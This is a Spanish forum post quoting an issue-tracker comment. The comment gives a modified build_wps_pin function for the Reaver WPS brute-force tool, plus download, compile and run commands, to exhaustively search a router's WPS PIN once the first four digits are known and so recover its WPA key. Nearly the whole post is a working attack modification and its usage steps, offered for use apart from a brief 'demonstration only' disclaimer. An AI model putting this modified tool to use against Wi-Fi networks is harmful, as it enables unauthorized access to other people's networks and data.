según el autor original del código(por cierto escrito en JAVA...
),es posible evitar el tema del 99,99%,modificando unas líneas de código....en este enlace lo podéis seguir
http://code.google.com/p/reaver-wps/issues/detail?id=195#c41Comment 41 by
stefano....@gmail.com, Oct 22, 2012
I'm proud of you Tystar!
You tried harder than anybody else looking for the insight and then you saw the light.
So it's time to show that light to all the masses.
Assumptions:
-the router accepts WPS transaction so it's not giving you continuously "timeout".
-you know the first 4 digits of the pin (for example 0123 or 1234 or whatever)
retrieve these information using original reaver before applying the modification.
---------------------------------------------------------------------------------------------
download reaver:
svn checkout
http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps-read-only
open the file /root/reaver-wps-read-only/src/pin.c with a text editor
(save a copy you will need it to reinstall original reaver)
after #include "pins.h" SUBSTITUTE THE FIRST FUNCTION WITH THIS SAME FUNCTION (modified):
/* EXHAUSTIVE MOD. init */
/*
* in these lines trivial modifications are applied over the original code.
* these lines have to be considered for demonstration purpose only.
* WPA PSK retrieval is not granted.
*
http://code.google.com/p/reaver-wps/issues/detail?id=195 */
/* set global vars */
int exhaustive_last_digit = 9;
int exhaustive_index = 000;
/* Builds a WPS PIN from the key tables */
char *build_wps_pin()
{
char *key = NULL, *pin = NULL;
int pin_len = PIN_SIZE + 1;
pin = malloc(pin_len);
key = malloc(pin_len);
if(pin && key)
{
memset(key, 0, pin_len);
memset(pin, 0, pin_len);
/* Generate a 7-digit pin */
snprintf(key, pin_len, "%s%s", get_p1(get_p1_index()), get_p2(exhaustive_index));
/* Append last digit */
snprintf(pin, pin_len, "%s%d", key, exhaustive_last_digit);
free(key);
if(exhaustive_last_digit==0)
{
if(exhaustive_index==999)
{
cprintf(CRITICAL, "[-] Failed to recover WPS pin. \n");
/* Clean up and get out */
globule_deinit();
exit(EXIT_FAILURE);
}
exhaustive_index++;
exhaustive_last_digit=9;
}else{
exhaustive_last_digit--;
}
}
return pin;
}
/* EXHAUSTIVE MOD. end */
-actual reaver have to be uninstalled:
cd /root/reaver-wps-read-only/src
./configure
make distclean
-modified reaver have to be installed:
cd /root/reaver-wps-read-only/src
./configure
make
make install
---------------------------------------------------------------------------------------------
call reaver with the option -p 0123 where "0123" are the pin first 4 digits.
if you don't specify these 4 digits worst-case will take at least 10 years (3sec/pin * 10^8pin).
using the right 4 digits worst-case will take at least 10 hours (3sec/pin * 10^4).
to reinstall original reaver:
substitute modified pins.c with the original pins.c that you kept safe somewhere.
uninstall and install with same commands as above.